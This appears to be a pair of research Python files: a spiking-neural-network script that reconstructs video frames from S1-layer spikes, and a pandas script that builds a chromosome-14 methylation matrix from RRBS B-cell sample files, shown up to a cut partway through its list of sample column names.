#!/bin/ipython
# ---LICENSE-BEGIN - DO NOT CHANGE OR MOVE THIS HEADER
# This file is part of the Neurorobotics Platform software
# Copyright (C) 2014,2015,2016,2017 Human Brain Project
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# ---LICENSE-END
import numpy as np
import cv2
import pyNN.nest as sim
import pathlib as plb
import time
import common as cm
import network as nw
import visualization as vis
args = cm.parse_args()
# Train weights
weights_dict, feature_imgs_dict = nw.train_weights(args.feature_dir)
# Open the video capture and writer objects
cap = cv2.VideoCapture(args.target_name)
cap_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
cap_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
writer = cv2.VideoWriter('video_S1_reconstructions/{}.avi'.format(\
plb.Path(args.target_name).stem),
int(cap.get(cv2.CAP_PROP_FOURCC)),
cap.get(cv2.CAP_PROP_FPS), (cap_width, cap_height),
isColor=False)
sim.setup(threads=4, spike_precision='on_grid')
# Set up the network
layer_collection = {} # layer name -> dict of S1 layers of type
# 'scale -> layer list'
layer_collection['input'] = nw.create_input_layers_for_scales(\
np.zeros((cap_height, cap_width)), args.scales)
layer_collection['S1'] = nw.create_S1_layers(layer_collection['input'],
weights_dict, args)
nw.create_cross_layer_inhibition(layer_collection['S1'])
# We build only the S1 layer for the moment, to speed up the simulation time
for layers in layer_collection['S1'].values():
for layer in layers:
layer.population.record('spikes')
# The actual frame-by-frame simulation and input neuron updating
t1 = time.clock()
#for i in range(int(cap.get(cv2.CAP_PROP_FRAME_COUNT))):
for i in range(args.frames):
t2 = time.clock()
img = cap.read()[1]
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# It's assumed that the image is already filtered, so no filtering is
# required
nw.change_rates_for_scales(layer_collection['input'], img)
sim.run(50)
# Refresh the current spike counts
for layers in layer_collection['S1'].values():
for layer in layers:
layer.update_spike_counts()
reconstructed_img = vis.create_S1_feature_image(img, layer_collection,
feature_imgs_dict, args)[1]
reconstructed_img = cv2.convertScaleAbs(reconstructed_img)
writer.write(reconstructed_img)
print('Frame', i, 'took', time.clock() - t2, 's to finish')
print('Processing', args.frames, 'frames took', time.clock() - t1, 's')
cap.release()
writer.release()
sim.end()
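# Note: each video frame is presented for 50 ms of simulated time (the
# sim.run(50) call above) before the S1 spike counts are refreshed and the
# reconstruction frame is written out.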
|
roberthangu/snn_object_recognition
|
video-test.py
|
Python
|
gpl-2.0
| 3,417
|
[
"NEURON"
] |
be0be512000af8173a4887523a103100bbae7afcd17837612c4817b2ee17ef25
|
import glob
import pandas as pd
import numpy as np
pd.set_option('display.max_columns', 50) # show up to 50 columns when printing
import os
os.chdir("/gpfs/commons/home/biederstedte-934/evan_projects/correct_phylo_files")
normalB = glob.glob("binary_position_RRBS_normal_B_cell*")
mcell = glob.glob("binary_position_RRBS_NormalBCD19pCD27mcell*")
pcell = glob.glob("binary_position_RRBS_NormalBCD19pCD27pcell*")
cd19cell = glob.glob("binary_position_RRBS_NormalBCD19pcell*")
print(len(normalB))
print(len(mcell))
print(len(pcell))
print(len(cd19cell))
totalfiles = normalB + mcell + pcell + cd19cell
print(len(totalfiles))
df_list = []
for file in totalfiles:
df = pd.read_csv(file)
df = df.drop("Unnamed: 0", axis=1)
df["chromosome"] = df["position"].map(lambda x: str(x)[:5])
df = df[df["chromosome"] == "chr14"]
df = df.drop("chromosome", axis=1)
df_list.append(df)
print(len(df_list))
total_matrix = pd.concat([df.set_index("position") for df in df_list], axis=1).reset_index().astype(object)
total_matrix = total_matrix.drop("index", axis=1)
len(total_matrix.columns)
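# The concat above outer-joins the per-sample frames on the CpG "position"
# index, so each column is one sample and positions absent from a sample
# become NaN. A minimal illustration of the idiom:
#   a = pd.DataFrame({"position": [1, 2], "x": [0, 1]})
#   b = pd.DataFrame({"position": [2, 3], "y": [1, 0]})
#   pd.concat([d.set_index("position") for d in (a, b)], axis=1)
#   # -> rows 1, 2, 3 with NaN where a sample lacks the position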
total_matrix.columns = ["RRBS_normal_B_cell_A1_24_TAAGGCGA.ACAACC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.ACCGCG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.ACGTGG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.AGGATG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.ATAGCG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.ATCGAC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.CAAGAG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.CATGAC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.CGGTAG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.CTATTG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.CTCAGC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.GACACG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.GCTGCC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.GGCATC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.GTGAGG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.GTTGAG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.TAGCGG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.TATCTC",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.TCTCTG",
"RRBS_normal_B_cell_A1_24_TAAGGCGA.TGACAG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.ACAACC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.ACCGCG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.ACTCAC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.ATAGCG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.CAAGAG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.CATGAC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.CCTTCG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.CGGTAG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.CTATTG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.CTCAGC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.GACACG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.GCATTC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.GGCATC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.GTGAGG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.GTTGAG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.TAGCGG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.TATCTC",
"RRBS_normal_B_cell_B1_24_CGTACTAG.TCTCTG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.TGACAG",
"RRBS_normal_B_cell_B1_24_CGTACTAG.TGCTGC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.ACAACC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.ACCGCG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.ACGTGG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.ACTCAC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.AGGATG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.ATAGCG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.ATCGAC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.CAAGAG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.CATGAC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.CGGTAG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.CTATTG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.GACACG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.GCATTC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.GCTGCC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.GGCATC",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.GTGAGG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.GTTGAG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.TAGCGG",
"RRBS_normal_B_cell_C1_24_AGGCAGAA.TATCTC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.ACAACC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.ACCGCG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.ACGTGG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.ACTCAC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.AGGATG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.ATCGAC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.CAAGAG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.CATGAC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.CCTTCG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.CGGTAG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.CTATTG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.CTCAGC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.GACACG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.GCATTC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.GCTGCC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.GGCATC",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.GTTGAG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.TAGCGG",
"RRBS_normal_B_cell_D1_24_TCCTGAGC.TATCTC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.ACAACC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.ACCGCG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.ACGTGG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.ACTCAC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.AGGATG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.ATAGCG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.ATCGAC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.CAAGAG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.CATGAC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.CGGTAG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.CTATTG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.CTCAGC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.GACACG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.GCATTC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.GCTGCC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.GGCATC",
"RRBS_normal_B_cell_G1_22_GGACTCCT.GTGAGG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.TAGCGG",
"RRBS_normal_B_cell_G1_22_GGACTCCT.TATCTC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.ACCGCG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.ACGTGG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.ACTCAC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.AGGATG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.ATCGAC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.CAAGAG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.CATGAC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.CCTTCG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.CTATTG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.CTCAGC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.GCATTC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.GCTGCC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.GGCATC",
"RRBS_normal_B_cell_H1_22_TAGGCATG.GTGAGG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.GTTGAG",
"RRBS_normal_B_cell_H1_22_TAGGCATG.TCTCTG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.ACCGCG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.ACGTGG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.ACTCAC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.ATAGCG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.ATCGAC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.CAAGAG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.CATGAC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.CCTTCG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.CTATTG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.CTCAGC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.GACACG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.GCATTC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.GCTGCC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.GGCATC",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.GTGAGG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.GTTGAG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.TAGCGG",
"RRBS_NormalBCD19pCD27mcell1_22_CGAGGCTG.TATCTC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.ACAACC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.ACCGCG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.ACGTGG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.ACTCAC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.AGGATG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.ATAGCG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.ATCGAC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.CAAGAG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.CATGAC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.CCTTCG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.CGGTAG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.CTATTG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.CTCAGC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.GACACG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.GCATTC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.GTGAGG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.GTTGAG",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.TATCTC",
"RRBS_NormalBCD19pCD27mcell23_44_GTAGAGGA.TCTCTG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.ACAACC",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.ACGTGG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.ACTCAC",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.AGGATG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.ATAGCG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.ATCGAC",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.CAAGAG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.CATGAC",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.CCTTCG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.CGGTAG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.CTATTG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.CTCAGC",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.GACACG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.GTGAGG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.TAGCGG",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.TATCTC",
"RRBS_NormalBCD19pCD27mcell45_66_TAAGGCGA.TCTCTG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.ACAACC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.ACCGCG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.ACGTGG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.ACTCAC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.AGGATG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.ATAGCG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.ATCGAC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.CAAGAG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.CATGAC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.CCTTCG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.CGGTAG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.CTATTG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.CTCAGC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.GACACG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.GCATTC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.GGCATC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.GTGAGG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.GTTGAG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.TAGCGG",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.TATCTC",
"RRBS_NormalBCD19pCD27mcell67_88_CGTACTAG.TCTCTG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.ACAACC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.ACCGCG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.ACTCAC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.AGGATG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.ATAGCG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.ATCGAC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.CAAGAG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.CATGAC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.CCTTCG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.CGGTAG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.CTATTG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.CTCAGC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.GCATTC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.GCTGCC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.GGCATC",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.GTGAGG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.GTTGAG",
"RRBS_NormalBCD19pCD27pcell1_22_TAGGCATG.TAGCGG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.ACAACC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.ACCGCG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.ACGTGG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.ACTCAC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.AGGATG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.ATAGCG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.ATCGAC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.CAAGAG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.CATGAC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.CCTTCG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.CGGTAG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.CTATTG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.CTCAGC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.GACACG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.GCATTC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.GCTGCC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.GGCATC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.GTGAGG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.GTTGAG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.TAGCGG",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.TATCTC",
"RRBS_NormalBCD19pCD27pcell23_44_CTCTCTAC.TCTCTG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.ACCGCG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.ACTCAC",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.ATAGCG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.CAAGAG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.CCTTCG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.CTATTG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.GACACG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.GTGAGG",
"RRBS_NormalBCD19pCD27pcell45_66_CAGAGAGG.TAGCGG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.ACAACC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.ACCGCG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.ACGTGG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.ACTCAC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.AGGATG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.ATAGCG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.ATCGAC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.CATGAC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.CCTTCG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.CGGTAG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.CTATTG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.CTCAGC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.GACACG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.GCATTC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.GCTGCC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.GGCATC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.GTGAGG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.GTTGAG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.TAGCGG",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.TATCTC",
"RRBS_NormalBCD19pCD27pcell67_88_GCTACGCT.TCTCTG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.ACAACC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.ACCGCG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.ACGTGG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.ACTCAC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.AGGATG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.ATAGCG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.ATCGAC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.CAAGAG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.CATGAC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.CCTTCG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.CGGTAG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.CTATTG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.CTCAGC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.GACACG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.GCATTC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.GCTGCC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.GGCATC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.GTTGAG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.TAGCGG",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.TATCTC",
"RRBS_NormalBCD19pcell1_22_TAAGGCGA.TCTCTG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.ACAACC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.ACCGCG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.ACGTGG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.ACTCAC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.AGGATG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.ATAGCG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.ATCGAC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.CATGAC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.CCTTCG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.CGGTAG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.CTATTG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.CTCAGC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.GACACG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.GCATTC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.GCTGCC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.GGCATC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.GTGAGG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.TAGCGG",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.TATCTC",
"RRBS_NormalBCD19pcell23_44_CGTACTAG.TCTCTG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.ACAACC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.ACCGCG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.ACGTGG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.ACTCAC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.AGGATG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.ATAGCG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.ATCGAC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.CAAGAG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.CATGAC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.CCTTCG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.CGGTAG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.CTATTG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.CTCAGC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.GACACG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.GCATTC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.GCTGCC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.GGCATC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.GTGAGG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.GTTGAG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.TAGCGG",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.TATCTC",
"RRBS_NormalBCD19pcell45_66_AGGCAGAA.TCTCTG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.ACAACC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.ACCGCG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.ACGTGG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.ACTCAC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.AGGATG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.ATAGCG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.ATCGAC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.CAAGAG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.CATGAC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.CCTTCG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.CGGTAG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.CTATTG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.CTCAGC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.GCATTC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.GCTGCC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.GGCATC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.GTGAGG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.GTTGAG",
